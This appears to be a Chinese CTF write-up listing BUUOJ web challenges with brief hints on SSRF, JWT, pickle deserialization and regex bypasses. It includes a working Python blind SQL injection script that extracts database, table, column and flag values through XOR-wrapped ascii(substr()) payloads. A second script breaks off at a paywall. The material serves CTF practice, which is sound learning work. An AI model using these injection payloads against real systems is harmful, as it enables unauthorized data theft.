[NCTF2019]True XML cookbook
最后一位不一定是11,需要自己内网探测
打2021的geek大挑战了
[MRCTF2020]套娃
[极客大挑战 2019]RCE ME
[CISCN2019 华北赛区 Day1 Web2]ikun
JWT、pickle反序列化
[WUSTCTF2020]颜值成绩查询
import requests
url= 'http://b91f52c4-276b-4113-9ede-54fb712ac6da.node3.buuoj.cn/'
database =""
payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#表名为flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名为flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
low = 32
high = 128
mid =(low + high) // 2
while(low < high):
# payload = payload1.format(i,mid) #查库名
# payload = payload2.format(i,mid) #查表名
# payload = payload3.format(i,mid) #查列名
payload = payload4.format(i,mid) #查flag
new_url = url + payload
r = requests.get(new_url)
print(new_url)
if "Hi admin, your score is: 100" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) //2
if (mid == 32 or mid == 132):
break
database +=chr(mid)
print(database)
print(database)
[FBCTF2019]RCEService
涉及利用换行绕过匹配,利用回溯次数绕过匹配
json序列化
[CISCN2019 华北赛区 Day1 Web1]Dropbox
0x80、0xff绕过正则匹配
[CISCN2019 总决赛 Day2 Web1]Easyweb
好一个渗透啊,好题
网上脚本不是很好用,自己改了改之前的盲注:
# -*- coding: utf-8 -*-
# @Author : Yn8rt
# @Time : 2021/9/10 14:38
import requests
url = "http://e2d4c3c6-a35f-49c7-9380-62b762460069.node4.buuoj.cn:81/image.php?"
flag = ""
i = 0
while True:
i += 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# 查库名
# payload = "database()"
# 查表名字
# payload = "select

这篇博客汇总了多种Web安全漏洞利用技术,包括SQL注入、SSRF、JWT漏洞、文件描述符利用、模板注入等,并展示了不同CTF比赛中的解题策略,如ASCII位偏移、正则绕过、PHP反序列化等。还提到了一些工具如Arjun、tplmap在渗透测试中的应用。
最低0.47元/天 解锁文章
398

被折叠的 条评论
为什么被折叠?



